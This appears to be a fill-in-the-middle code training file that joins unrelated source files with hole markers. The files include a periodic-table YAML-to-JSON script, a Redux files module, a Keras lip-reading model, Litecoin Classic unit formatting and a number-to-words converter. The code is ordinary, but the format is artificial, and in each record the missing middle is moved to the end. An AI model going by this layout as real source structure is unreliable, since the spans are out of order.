InventoryHelper.dropInventoryItems(worldIn, pos, (TileEntityCombustionEngine) tileEntity);
worldIn.updateComparatorOutputLevel(pos, this);
}
super.breakBlock(worldIn, pos, state);
}
@Override
public boolean onBlockActivated(World worldIn, BlockPos pos, IBlockState state, EntityPlayer playerIn, EnumHand hand, EnumFacing facing, float hitX, float hitY, float hitZ)
{
if (!worldIn.isRemote)
{
playerIn.openGui(Power.instance(), GuiHandler.ENGINE_COMBUSTION, worldIn, pos.getX(), pos.getY(), pos.getZ());
}
return true;
}
@Override
public void onBlockPlacedBy(World worldIn, BlockPos pos, IBlockState state, EntityLivingBase placer, ItemStack stack)
{
TileEntity tileEntity = worldIn.getTileEntity(pos);
if (tileEntity instanceof TileEntityCombustionEngine)
{
((TileEntityCombustionEngine) tileEntity).setCustomName(stack.getDisplayName());
}
}
}<|fim▁end|>
| |
<|file_name|>update_pt_data.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Developer script to convert yaml periodic table to json format.
Created on Nov 15, 2011
'''
from __future__ import division
import json
import ruamel.yaml as yaml
import re
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2011, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "[email protected]"
__date__ = "Nov 15, 2011"
def test_yaml():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
print(data)
def test_json():
with open('periodic_table.json', 'r') as f:
data = json.load(f)
print(data)
def parse_oxi_state():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
f = open('oxidation_states.txt', 'r')
oxidata = f.read()
f.close()
oxidata = re.sub('[\n\r]', '', oxidata)
patt = re.compile('<tr>(.*?)</tr>', re.MULTILINE)
for m in patt.finditer(oxidata):
line = m.group(1)
line = re.sub('</td>', '', line)
line = re.sub('(<td>)+', '<td>', line)
line = re.sub('</*a[^>]*>', '', line)
el = None
oxistates = []
common_oxi = []
for tok in re.split('<td>', line.strip()):
m2 = re.match("<b>([A-Z][a-z]*)</b>", tok)
if m2:
el = m2.group(1)
else:
m3 = re.match("(<b>)*([\+\-]\d)(</b>)*", tok)
if m3:
oxistates.append(int(m3.group(2)))
if m3.group(1):
common_oxi.append(int(m3.group(2)))
if el in data:
del data[el]['Max oxidation state']
del data[el]['Min oxidation state']
del data[el]['Oxidation_states']
del data[el]['Common_oxidation_states']
data[el]['Oxidation states'] = oxistates
data[el]['Common oxidation states'] = common_oxi
else:
print(el)
with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
def parse_ionic_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
f = open('ionic_radii.csv', 'r')
radiidata = f.read()
f.close()
radiidata = radiidata.split("\r")
header = radiidata[0].split(",")
for i in range(1, len(radiidata)):
line = radiidata[i]
toks = line.strip().split(",")
suffix = ""
name = toks[1]
if len(name.split(" ")) > 1:
suffix = "_" + name.split(" ")[1]
el = toks[2]
ionic_radii = {}
for j in range(3, len(toks)):
m = re.match("^\s*([0-9\.]+)", toks[j])
if m:
ionic_radii[int(header[j])] = float(m.group(1))
if el in data:
data[el]['Ionic_radii' + suffix] = ionic_radii
if suffix == '_hs':
data[el]['Ionic_radii'] = ionic_radii
else:
print(el)<|fim▁hole|> with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
def parse_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
f = open('radii.csv', 'r')
radiidata = f.read()
f.close()
radiidata = radiidata.split("\r")
header = radiidata[0].split(",")
for i in range(1, len(radiidata)):
line = radiidata[i]
toks = line.strip().split(",")
el = toks[1]
try:
atomic_radii = float(toks[3]) / 100
except:
atomic_radii = toks[3]
try:
atomic_radii_calc = float(toks[4]) / 100
except:
atomic_radii_calc = toks[4]
try:
vdw_radii = float(toks[5]) / 100
except:
vdw_radii = toks[5]
if el in data:
data[el]['Atomic radius'] = atomic_radii
data[el]['Atomic radius calculated'] = atomic_radii_calc
data[el]['Van der waals radius'] = vdw_radii
else:
print(el)
with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
def update_ionic_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
for el, d in data.items():
if "Ionic_radii" in d:
d["Ionic radii"] = {k: v / 100
for k, v in d["Ionic_radii"].items()}
del d["Ionic_radii"]
if "Ionic_radii_hs" in d:
d["Ionic radii hs"] = {k: v / 100
for k, v in d["Ionic_radii_hs"].items()}
del d["Ionic_radii_hs"]
if "Ionic_radii_ls" in d:
d["Ionic radii ls"] = {k: v / 100
for k, v in d["Ionic_radii_ls"].items()}
del d["Ionic_radii_ls"]
with open('periodic_table2.yaml', 'w') as f:
yaml.dump(data, f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
def parse_shannon_radii():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
from openpyxl import load_workbook
import collections
wb = load_workbook('Shannon Radii.xlsx')
print(wb.get_sheet_names())
sheet = wb["Sheet1"]
i = 2
radii = collections.defaultdict(dict)
while sheet["E%d" % i].value:
if sheet["A%d" % i].value:
el = sheet["A%d" % i].value
if sheet["B%d" % i].value:
charge = int(sheet["B%d" % i].value)
radii[el][charge] = dict()
if sheet["C%d" % i].value:
cn = sheet["C%d" % i].value
if cn not in radii[el][charge]:
radii[el][charge][cn] = dict()
if sheet["D%d" % i].value is not None:
spin = sheet["D%d" % i].value
else:
spin = ""
# print("%s - %d - %s" % (el, charge, cn))
radii[el][charge][cn][spin] = {
"crystal_radius": float(sheet["E%d" % i].value),
"ionic_radius": float(sheet["F%d" % i].value),
}
i += 1
for el in radii.keys():
if el in data:
data[el]["Shannon radii"] = dict(radii[el])
with open('periodic_table.yaml', 'w') as f:
yaml.safe_dump(data, f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
def gen_periodic_table():
with open('periodic_table.yaml', 'r') as f:
data = yaml.load(f)
with open('periodic_table.json', 'w') as f:
json.dump(data, f)
if __name__ == "__main__":
parse_shannon_radii()
#gen_periodic_table()<|fim▁end|>
| |
<|file_name|>files.js<|end_file_name|><|fim▁begin|>import { apiGet, apiPut, apiDelete } from 'utils/api'
import { flashError, flashSuccess } from 'utils/flash'
import { takeLatest, takeEvery, call, put, select } from 'redux-saga/effects'
import { filter, find, without, omit } from 'lodash'
import { filesUrlSelector } from 'ducks/app'
import { makeUploadsSelector } from 'ducks/uploads'
import { makeFiltersQuerySelector } from 'ducks/filters'
import { makeSelectedFileIdsSelector } from 'ducks/filePlacements'
// Constants
const GET_FILES = 'files/GET_FILES'
const GET_FILES_SUCCESS = 'files/GET_FILES_SUCCESS'
const UPLOADED_FILE = 'files/UPLOADED_FILE'
const THUMBNAIL_GENERATED = 'files/THUMBNAIL_GENERATED'
const DELETE_FILE = 'files/DELETE_FILE'
const DELETE_FILE_FAILURE = 'files/DELETE_FILE_FAILURE'
const UPDATE_FILE = 'files/UPDATE_FILE'
export const UPDATE_FILE_SUCCESS = 'files/UPDATE_FILE_SUCCESS'
export const UPDATE_FILE_FAILURE = 'files/UPDATE_FILE_FAILURE'
const UPDATED_FILES = 'files/UPDATED_FILES'
const REMOVED_FILES = 'files/REMOVED_FILES'
const CHANGE_FILES_PAGE = 'files/CHANGE_FILES_PAGE'
const MASS_SELECT = 'files/MASS_SELECT'
const MASS_DELETE = 'files/MASS_DELETE'
const MASS_CANCEL = 'files/MASS_CANCEL'
// Actions
export function getFiles (fileType, filesUrl, query = '') {
return { type: GET_FILES, fileType, filesUrl, query }
}
export function getFilesSuccess (fileType, records, meta) {
return { type: GET_FILES_SUCCESS, fileType, records, meta }
}
export function uploadedFile (fileType, file) {
return { type: UPLOADED_FILE, fileType, file }
}
export function thumbnailGenerated (fileType, temporaryUrl, url) {
return { type: THUMBNAIL_GENERATED, fileType, temporaryUrl, url }
}
export function updatedFiles (fileType, files) {
return { type: UPDATED_FILES, fileType, files }
}
export function updateFile (fileType, filesUrl, file, attributes) {
return { type: UPDATE_FILE, fileType, filesUrl, file, attributes }
}
export function deleteFile (fileType, filesUrl, file) {
return { type: DELETE_FILE, fileType, filesUrl, file }
}
export function deleteFileFailure (fileType, file) {
return { type: DELETE_FILE_FAILURE, fileType, file }
}
export function removedFiles (fileType, ids) {
return { type: REMOVED_FILES, fileType, ids }
}
export function updateFileSuccess (fileType, file, response) {
return { type: UPDATE_FILE_SUCCESS, fileType, file, response }
}
export function updateFileFailure (fileType, file) {
return { type: UPDATE_FILE_FAILURE, fileType, file }
}
export function changeFilesPage (fileType, filesUrl, page) {
return { type: CHANGE_FILES_PAGE, fileType, filesUrl, page }
}
export function massSelect (fileType, file, select) {
return { type: MASS_SELECT, fileType, file, select }
}
export function massDelete (fileType) {
return { type: MASS_DELETE, fileType }
}
export function massCancel (fileType) {
return { type: MASS_CANCEL, fileType }
}
// Sagas
function * getFilesPerform (action) {
try {
const filesUrl = `${action.filesUrl}?${action.query}`
const response = yield call(apiGet, filesUrl)
yield put(getFilesSuccess(action.fileType, response.data, response.meta))
} catch (e) {
flashError(e.message)
}
}
function * getFilesSaga () {
// takeLatest automatically cancels any saga task started previously if it's still running
yield takeLatest(GET_FILES, getFilesPerform)
}
function * updateFilePerform (action) {
try {
const { file, filesUrl, attributes } = action
const fullUrl = `${filesUrl}/${file.id}`
const data = {
file: {
id: file.id,
attributes
}
}
const response = yield call(apiPut, fullUrl, data)
yield put(updateFileSuccess(action.fileType, action.file, response.data))
} catch (e) {
flashError(e.message)
yield put(updateFileFailure(action.fileType, action.file))
}
}
function * updateFileSaga () {
yield takeEvery(UPDATE_FILE, updateFilePerform)
}
function * changeFilesPagePerform (action) {
try {
const filtersQuery = yield select(makeFiltersQuerySelector(action.fileType))
let query = `page=${action.page}`
if (filtersQuery) {
query = `${query}&${filtersQuery}`
}
yield put(getFiles(action.fileType, action.filesUrl, query))
} catch (e) {
flashError(e.message)
}
}
function * changeFilesPageSaga () {
yield takeLatest(CHANGE_FILES_PAGE, changeFilesPagePerform)
}
function * massDeletePerform (action) {
try {
const { massSelectedIds } = yield select(makeMassSelectedIdsSelector(action.fileType))
const filesUrl = yield select(filesUrlSelector)
const fullUrl = `${filesUrl}/mass_destroy?ids=${massSelectedIds.join(',')}`
const res = yield call(apiDelete, fullUrl)
if (res.error) {
flashError(res.error)
} else {
flashSuccess(res.data.message)
yield put(removedFiles(action.fileType, massSelectedIds))
yield put(massCancel(action.fileType))
}
} catch (e) {
flashError(e.message)
}
}
function * massDeleteSaga () {
yield takeLatest(MASS_DELETE, massDeletePerform)
}
function * deleteFilePerform (action) {
try {
const res = yield call(apiDelete, `${action.filesUrl}/${action.file.id}`)
if (res.error) {
flashError(res.error)
} else {
yield put(removedFiles(action.fileType, [action.file.id]))
}
} catch (e) {
flashError(e.message)
}
}
function * deleteFileSaga () {
yield takeLatest(DELETE_FILE, deleteFilePerform)
}
export const filesSagas = [
getFilesSaga,
updateFileSaga,
changeFilesPageSaga,
massDeleteSaga,
deleteFileSaga
]
// Selectors
export const makeFilesStatusSelector = (fileType) => (state) => {
return {
loading: state.files[fileType] && state.files[fileType].loading,
loaded: state.files[fileType] && state.files[fileType].loaded,
massSelecting: state.files[fileType].massSelectedIds.length > 0
}
}
export const makeFilesLoadedSelector = (fileType) => (state) => {
return state.files[fileType] && state.files[fileType].loaded
}
export const makeMassSelectedIdsSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
return {
massSelectedIds: base.massSelectedIds,
massSelectedIndestructibleIds: base.massSelectedIndestructibleIds
}
}
export const makeFilesSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
const selected = base.massSelectedIds
return base.records.map((file) => {
if (file.id && selected.indexOf(file.id) !== -1) {
return { ...file, massSelected: true }
} else {
return file
}
})
}
export const makeFilesForListSelector = (fileType) => (state) => {
const uploads = makeUploadsSelector(fileType)(state)
let files
if (uploads.uploadedIds.length) {
files = makeFilesSelector(fileType)(state).map((file) => {
if (uploads.uploadedIds.indexOf(file.id) === -1) {
return file
} else {
return { ...file, attributes: { ...file.attributes, freshlyUploaded: true } }
}
})
} else {
files = makeFilesSelector(fileType)(state)
}
return [
...Object.values(uploads.records).map((upload) => ({ ...upload, attributes: { ...upload.attributes, uploading: true } })),
...files
]
}
export const makeRawUnselectedFilesForListSelector = (fileType, selectedIds) => (state) => {
const all = makeFilesForListSelector(fileType)(state)
return filter(all, (file) => selectedIds.indexOf(String(file.id)) === -1)
}
export const makeUnselectedFilesForListSelector = (fileType) => (state) => {
const all = makeFilesForListSelector(fileType)(state)
const selectedIds = makeSelectedFileIdsSelector(fileType)(state)
return filter(all, (file) => selectedIds.indexOf(String(file.id)) === -1)
}
export const makeFilesPaginationSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
return base.pagination
}
export const makeFilesReactTypeSelector = (fileType) => (state) => {
const base = state.files[fileType] || defaultFilesKeyState
return base.reactType
}
export const makeFilesReactTypeIsImageSelector = (fileType) => (state) => {
return makeFilesReactTypeSelector(fileType)(state) === 'image'
}
// State
const defaultFilesKeyState = {
loading: false,
loaded: false,
records: [],
massSelectedIds: [],
massSelectedIndestructibleIds: [],
reactType: 'document',
pagination: {
page: null,
pages: null
}
}
const initialState = {}
// Reducer
function filesReducer (rawState = initialState, action) {
const state = rawState
if (action.fileType && !state[action.fileType]) {
state[action.fileType] = { ...defaultFilesKeyState }
}
switch (action.type) {
case GET_FILES:
return {
...state,
[action.fileType]: {
...state[action.fileType],
loading: true
}
}
case GET_FILES_SUCCESS:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: action.records,
loading: false,
loaded: true,
pagination: omit(action.meta, ['react_type']),
reactType: action.meta.react_type
}
}
case UPLOADED_FILE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: [action.file, ...state[action.fileType].records]
}
}
case THUMBNAIL_GENERATED: {
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.attributes.thumb !== action.temporaryUrl) return record
return {
...record,
attributes: {
...record.attributes,
thumb: action.url
}
}
})
}
}
}
case UPDATE_FILE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return {
...record,
attributes: {
...record.attributes,
...action.attributes,
updating: true
}
}
} else {
return record
}
})
}
}
case UPDATE_FILE_SUCCESS:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.response.id) {
return action.response
} else {
return record
}
})
}
}
case UPDATE_FILE_FAILURE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return { ...action.file }
} else {
return record
}
})
}
}
case UPDATED_FILES:<|fim▁hole|> return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
const found = find(action.files, { id: record.id })
return found || record
})
}
}
case MASS_SELECT: {
if (!action.file.id) return state
let massSelectedIds = state[action.fileType].massSelectedIds
let massSelectedIndestructibleIds = state[action.fileType].massSelectedIndestructibleIds
if (action.select) {
massSelectedIds = [...massSelectedIds, action.file.id]
if (action.file.attributes.file_placements_size) {
massSelectedIndestructibleIds = [...massSelectedIndestructibleIds, action.file.id]
}
} else {
massSelectedIds = without(massSelectedIds, action.file.id)
if (action.file.attributes.file_placements_size) {
massSelectedIndestructibleIds = without(massSelectedIndestructibleIds, action.file.id)
}
}
return {
...state,
[action.fileType]: {
...state[action.fileType],
massSelectedIds,
massSelectedIndestructibleIds
}
}
}
case MASS_CANCEL:
return {
...state,
[action.fileType]: {
...state[action.fileType],
massSelectedIds: []
}
}
case REMOVED_FILES: {
const originalLength = state[action.fileType].records.length
const records = state[action.fileType].records.filter((record) => action.ids.indexOf(record.id) === -1)
return {
...state,
[action.fileType]: {
...state[action.fileType],
records,
pagination: {
...state[action.fileType].pagination,
to: records.length,
count: state[action.fileType].pagination.count - (originalLength - records.length)
}
}
}
}
case DELETE_FILE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return {
...record,
_destroying: true
}
} else {
return record
}
})
}
}
case DELETE_FILE_FAILURE:
return {
...state,
[action.fileType]: {
...state[action.fileType],
records: state[action.fileType].records.map((record) => {
if (record.id === action.file.id) {
return { ...action.file }
} else {
return record
}
})
}
}
default:
return state
}
}
export default filesReducer<|fim▁end|>
| |
<|file_name|>example0.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
import threading
def worker():<|fim▁hole|>
for i in range(8):
threading.Thread(target = worker).start()<|fim▁end|>
|
print('new worker')
|
<|file_name|>time_dis_cnn.py<|end_file_name|><|fim▁begin|>"""
Multiple stacked lstm implemeation on the lip movement data.
Akm Ashiquzzaman
[email protected]
Fall 2016
"""
from __future__ import print_function
import numpy as np
np.random.seed(1337)
#random seed fixing for reproducibility
#data load & preprocessing
X_train = np.load('../data/videopart43.npy').astype('float32')
Y_train = np.load('../data/audiopart43.npy').astype('float32')<|fim▁hole|>X_train = X_train/255
Y_train = Y_train/32767
X_train = X_train.reshape((826,13,1,53,53)).astype('float32')
Y_train = Y_train.reshape((826,13*4702)).astype('float32')
from keras.models import Sequential
from keras.layers import Dense,Activation,Dropout,TimeDistributed,LSTM,Bidirectional
from keras.layers import Convolution2D,Flatten,MaxPooling2D
import time
print("Building Model.....")
model_time = time.time()
model = Sequential()
model.add(TimeDistributed(Convolution2D(64, 3, 3,border_mode='valid'),batch_input_shape=(14,13,1,53,53),input_shape=(13,1,53,53)))
model.add(Activation('tanh'))
model.add(Dropout(0.25))
model.add(TimeDistributed(Convolution2D(32, 2, 2, border_mode='valid')))
model.add(Activation('tanh'))
model.add(TimeDistributed(Flatten()))
model.add(Bidirectional(LSTM(256,return_sequences=True,stateful=True)))
model.add(Dropout(0.20))
model.add(Bidirectional(LSTM(128,return_sequences=True,stateful=True)))
model.add(Dropout(0.20))
model.add((LSTM(64,stateful=True)))
model.add(Dropout(0.20))
model.add((Dense(512)))
model.add(Activation('tanh'))
model.add(Dropout(0.5))
model.add((Dense(13*4702)))
model.add(Activation('tanh'))
model.compile(loss='mse', optimizer='rmsprop', metrics=['accuracy'])
#checkpoint import
from keras.callbacks import ModelCheckpoint
from os.path import isfile, join
#weight file name
weight_file = '../weights/time-dis-cnn_weight.h5'
#loading previous weight file for resuming training
if isfile(weight_file):
model.load_weights(weight_file)
#weight-checkmark
checkpoint = ModelCheckpoint(weight_file, monitor='acc', verbose=1, save_best_only=True, mode='max')
callbacks_list = [checkpoint]
print("model compile time: "+str(time.time()-model_time)+'s')
# fit the model
model.fit(X_train,Y_train, nb_epoch=1, batch_size=14,callbacks=callbacks_list)
pred = model.predict(X_train,batch_size=14,verbose=1)
pred = pred*32767
pred = pred.reshape(826*13,4702)
print('pred shape',pred.shape)
print('pred dtype',pred.dtype)
np.save('../predictions/pred-time-cnn.npy',pred)<|fim▁end|>
|
#normalizing data
|
<|file_name|>bitcoinunits.cpp<|end_file_name|><|fim▁begin|>#include "bitcoinunits.h"
#include <QStringList>
BitcoinUnits::BitcoinUnits(QObject *parent):
QAbstractListModel(parent),
unitlist(availableUnits())
{
}
QList<BitcoinUnits::Unit> BitcoinUnits::availableUnits()
{
QList<BitcoinUnits::Unit> unitlist;
unitlist.append(BTC);
unitlist.append(mBTC);
unitlist.append(uBTC);
return unitlist;
}
bool BitcoinUnits::valid(int unit)
{
switch(unit)
{
case BTC:
case mBTC:
case uBTC:
return true;
default:
return false;
}
}
QString BitcoinUnits::name(int unit)
{
switch(unit)
{
case BTC: return QString("LTCC");
case mBTC: return QString("mLTCC");
case uBTC: return QString::fromUtf8("μLTCC");
default: return QString("???");
}
}
QString BitcoinUnits::description(int unit)
{
switch(unit)
{
case BTC: return QString("Litecoin Classic");
case mBTC: return QString("milli Litecoin Classic (1 / 1,000)");
case uBTC: return QString("micro Litecoin Classic (1 / 1,000,000)");
default: return QString("???");
}
}
//a single unit (.00000001) of Litecoin Classic is called a "wander."
qint64 BitcoinUnits::factor(int unit)
{
switch(unit)
{
case BTC: return 100000000;
case mBTC: return 100000;
case uBTC: return 100;
default: return 100000000;
}
}
int BitcoinUnits::amountDigits(int unit)
{
switch(unit)
{
case BTC: return 8; // 21,000,000 (# digits, without commas)
case mBTC: return 11; // 21,000,000,000
case uBTC: return 14; // 21,000,000,000,000
default: return 0;
}
}
int BitcoinUnits::decimals(int unit)
{
switch(unit)
{
case BTC: return 8;
case mBTC: return 5;
case uBTC: return 2;
default: return 0;
}
}
QString BitcoinUnits::format(int unit, qint64 n, bool fPlus)
{
// Note: not using straight sprintf here because we do NOT want
// localized number formatting.
if(!valid(unit))
return QString(); // Refuse to format invalid unit
qint64 coin = factor(unit);
int num_decimals = decimals(unit);
qint64 n_abs = (n > 0 ? n : -n);
qint64 quotient = n_abs / coin;
qint64 remainder = n_abs % coin;
QString quotient_str = QString::number(quotient);
QString remainder_str = QString::number(remainder).rightJustified(num_decimals, '0');
// Right-trim excess 0's after the decimal point
int nTrim = 0;
for (int i = remainder_str.size()-1; i>=2 && (remainder_str.at(i) == '0'); --i)
++nTrim;
remainder_str.chop(nTrim);
if (n < 0)
quotient_str.insert(0, '-');
else if (fPlus && n > 0)
quotient_str.insert(0, '+');
return quotient_str + QString(".") + remainder_str;
}
QString BitcoinUnits::formatWithUnit(int unit, qint64 amount, bool plussign)
{
return format(unit, amount, plussign) + QString(" ") + name(unit);
}
bool BitcoinUnits::parse(int unit, const QString &value, qint64 *val_out)
{
if(!valid(unit) || value.isEmpty())
return false; // Refuse to parse invalid unit or empty string
int num_decimals = decimals(unit);
QStringList parts = value.split(".");
if(parts.size() > 2)
{
return false; // More than one dot
}
QString whole = parts[0];
QString decimals;
if(parts.size() > 1)
{
decimals = parts[1];
}
if(decimals.size() > num_decimals)
{
return false; // Exceeds max precision
}
bool ok = false;
QString str = whole + decimals.leftJustified(num_decimals, '0');
if(str.size() > 18)
{
return false; // Longer numbers will exceed 63 bits
}
qint64 retvalue = str.toLongLong(&ok);
if(val_out)
{
*val_out = retvalue;
}
return ok;
}
int BitcoinUnits::rowCount(const QModelIndex &parent) const
{
Q_UNUSED(parent);
return unitlist.size();
}<|fim▁hole|> if(row >= 0 && row < unitlist.size())
{
Unit unit = unitlist.at(row);
switch(role)
{
case Qt::EditRole:
case Qt::DisplayRole:
return QVariant(name(unit));
case Qt::ToolTipRole:
return QVariant(description(unit));
case UnitRole:
return QVariant(static_cast<int>(unit));
}
}
return QVariant();
}<|fim▁end|>
|
QVariant BitcoinUnits::data(const QModelIndex &index, int role) const
{
int row = index.row();
|
<|file_name|>base.py<|end_file_name|><|fim▁begin|>from decimal import Decimal
map_ones = {
0: "",
1: "One",
2: "Two",
3: "Three",
4: "Four",
5: "Five",
6: "Six",
7: "Seven",
8: "Eight",
9: "Nine",
}
map_tens = {
10: "Ten",
11: "Eleven",
12: "Twelve",
13: "Thirteen",
14: "Fourteen",
15: "Fifteen",
16: "Sixteen",
17: "Seventeen",
18: "Eighteen",
19: "Nineteen",
}
map_tenths = {
2: "Twenty",
3: "Thirty",
4: "Forty",
5: "Fifty",
6: "Sixty",
7: "Seventy",
8: "Eighty",
9: "Ninety",
}
def convert_ones(num):
"""
Convert ones number to word.
Parameters
----------
num: int
Single digit integer number
"""
if len(str(num)) > 1:
raise Exception("Must have at most 1 digit")
num = int(num)
return map_ones[num]
def convert_tenths(num):
"""
Convert tenths number to word.
Parameters
----------
num: int
Double digit integer number
"""
if len(str(num)) > 2:
raise Exception("Must have at most 2 digits")
num = int(num)
bases = ""
# less than 10
if num < 10:
return map_ones[num]
# 10-19
if 10 <= num < 20:
return map_tens[num]
# 20-99
first_num = map_tenths[int(str(num)[0])]
second_num = map_ones[int(str(num)[1])]
if not second_num:
return first_num
return first_num + " " + second_num
def get_dollar(hundredth, tenth, one, base):
"""
Given hundredth, tenth and one integer number for base (e.g. Billion, Million), return converted word
Parameters
----------
hundredth: int
Hundredth number
tenth: int
Tenth number
one: int
One number
base: string
Base value
"""
dollar_word = ""
if hundredth:
dollar_word += "{0} Hundred".format(convert_ones(hundredth))
# Add "And" if there's numbers after hundredths
if hundredth and (tenth or one):
dollar_word += " And "
if tenth or one:
dollar_word += "{0}".format(convert_tenths(int(str(tenth) + str(one))))
if base:
dollar_word += " {0}".format(base)
return dollar_word
def get_billion(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "Billion")
def get_million(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "Million")
def get_thousand(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "Thousand")
def get_one(hundredth, tenth, one):
return get_dollar(hundredth, tenth, one, "")
def get_cent(tenth, one):
"""
Given tenth and one integer number (for cent), return converted word
Parameters
----------
tenth: int
Tenth number
one: int
One number
"""
cent_word = ""
if tenth or one:
cent_word += "{0}".format(convert_tenths(int(str(tenth) + str(one))))
if cent_word:
cent_word = "Cents {0} ".format(cent_word)
return cent_word
def get_index(val, index, default=0):
try:
return val[index]
except IndexError:
return default
def extract(num):
"""
Given a max 3 character number, extract and return hundredth, tenth and one value
Parameters
----------
num: string
Number in string
Return
----------
hundredth: int
Hundredth number
tenth: int
Tenth number
one: int
One number
"""
hundredth = 0
tenth = 0
one = 0
if len(num) == 3:
hundredth, tenth, one = int(num[0]), int(num[1]), int(num[2])
if len(num) == 2:
tenth, one = int(num[0]), int(num[1])
if len(num) == 1:
one = int(num[0])
return hundredth, tenth, one
def generate_dollar_word(num):
"""
Generate word for dollar
Parameters
----------
num: string
Dollar number in string
"""
word = ""
# at least 1 billion
if len(num) > 9:
billion_num = int(num[0:(len(num)-9)])
num = str(int(num) - (billion_num*int(1e9)))
hundredth, tenth, one = extract(str(billion_num))
word += "{0} ".format(get_billion(hundredth, tenth, one))
# at least 1 million
if len(num) > 6:
million_num = int(num[0:(len(num)-6)])
num = str(int(num) - (million_num*int(1e6)))
hundredth, tenth, one = extract(str(million_num))
word += "{0} ".format(get_million(hundredth, tenth, one))
# at least 1 thousand
if len(num) > 3:
thousand_num = int(num[0:(len(num)-3)])
num = str(int(num) - (thousand_num*int(1e3)))
hundredth, tenth, one = extract(str(thousand_num))
word += "{0} ".format(get_thousand(hundredth, tenth, one))
# at least 1
if int(num) and len(num) > 0:
one_num = int(num[0:len(num)])<|fim▁hole|>
def generate_cent_word(num):
"""
Generate word for cent
Parameters
----------
num: string
Cent number in string
"""
word = ""
hundredth, tenth, one = extract(str(num))
word += get_cent(tenth, one)
return word
def validate(amt):
# amt MUST be in string to avoid accidental round off
if Decimal(amt) > Decimal(str(1e11)):
raise Exception("Please enter an amount smaller than 100 billion")
if len(get_index(amt.split('.'), 1, "")) > 2:
raise Exception("Please enter an amount within 2 decimal place")
def generate_word(amt):
# remove commas and spaces from word
amt = amt.replace(",", "").replace(" ", "")
validate(amt)
amt = '{0:.2f}'.format(Decimal(amt))
amt_list = amt.split('.')
dollar_amt = get_index(amt_list, 0)
cent_amt = get_index(amt_list, 1)
dollar_word = generate_dollar_word(dollar_amt)
cent_word = generate_cent_word(cent_amt)
if not dollar_word:
return cent_word + "Only"
if not cent_word:
return dollar_word + "Only"
return dollar_word + "And " + cent_word + "Only"<|fim▁end|>
|
num = str(int(num) - one_num)
hundredth, tenth, one = extract(str(one_num))
word += "{0} ".format(get_one(hundredth, tenth, one))
return word
|
<|file_name|>ServletContainerInitializerImpl.java<|end_file_name|><|fim▁begin|>package com.example;
import java.util.Set;
<|fim▁hole|>import javax.servlet.ServletException;
import javax.servlet.ServletRegistration;
import org.springframework.web.context.support.AnnotationConfigWebApplicationContext;
import org.springframework.web.servlet.DispatcherServlet;
public class ServletContainerInitializerImpl implements ServletContainerInitializer {
@Override
public void onStartup(final Set<Class<?>> c, final ServletContext ctx) throws ServletException {
final AnnotationConfigWebApplicationContext wac = new AnnotationConfigWebApplicationContext();
wac.register(MvcConfig.class);
wac.refresh();
final DispatcherServlet servlet = new DispatcherServlet(wac);
final ServletRegistration.Dynamic reg = ctx.addServlet("dispatcher", servlet);
reg.addMapping("/*");
}
}<|fim▁end|>
|
import javax.servlet.ServletContainerInitializer;
import javax.servlet.ServletContext;
|
<|file_name|>prototype.js<|end_file_name|><|fim▁begin|>/* Prototype JavaScript framework, version 1.6.0
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype web site: http://www.prototypejs.org/
*
*--------------------------------------------------------------------------*/
var Prototype = {
Version: '1.6.0',
Browser: {
IE: !!(window.attachEvent && !window.opera),
Opera: !!window.opera,
WebKit: navigator.userAgent.indexOf('AppleWebKit/') > -1,
Gecko: navigator.userAgent.indexOf('Gecko') > -1 && navigator.userAgent.indexOf('KHTML') == -1,
MobileSafari: !!navigator.userAgent.match(/Apple.*Mobile.*Safari/)
},
BrowserFeatures: {
XPath: !!document.evaluate,
ElementExtensions: !!window.HTMLElement,
SpecificElementExtensions:
document.createElement('div').__proto__ &&
document.createElement('div').__proto__ !==
document.createElement('form').__proto__
},
ScriptFragment: '<script[^>]*>([\\S\\s]*?)<\/script>',
JSONFilter: /^\/\*-secure-([\s\S]*)\*\/\s*$/,
emptyFunction: function() { },
K: function(x) { return x }
};
if (Prototype.Browser.MobileSafari)
Prototype.BrowserFeatures.SpecificElementExtensions = false;
if (Prototype.Browser.WebKit)
Prototype.BrowserFeatures.XPath = false;
/* Based on Alex Arnell's inheritance implementation. */
var Class = {
create: function() {
var parent = null, properties = $A(arguments);
if (Object.isFunction(properties[0]))
parent = properties.shift();
function klass() {
this.initialize.apply(this, arguments);
}
Object.extend(klass, Class.Methods);
klass.superclass = parent;
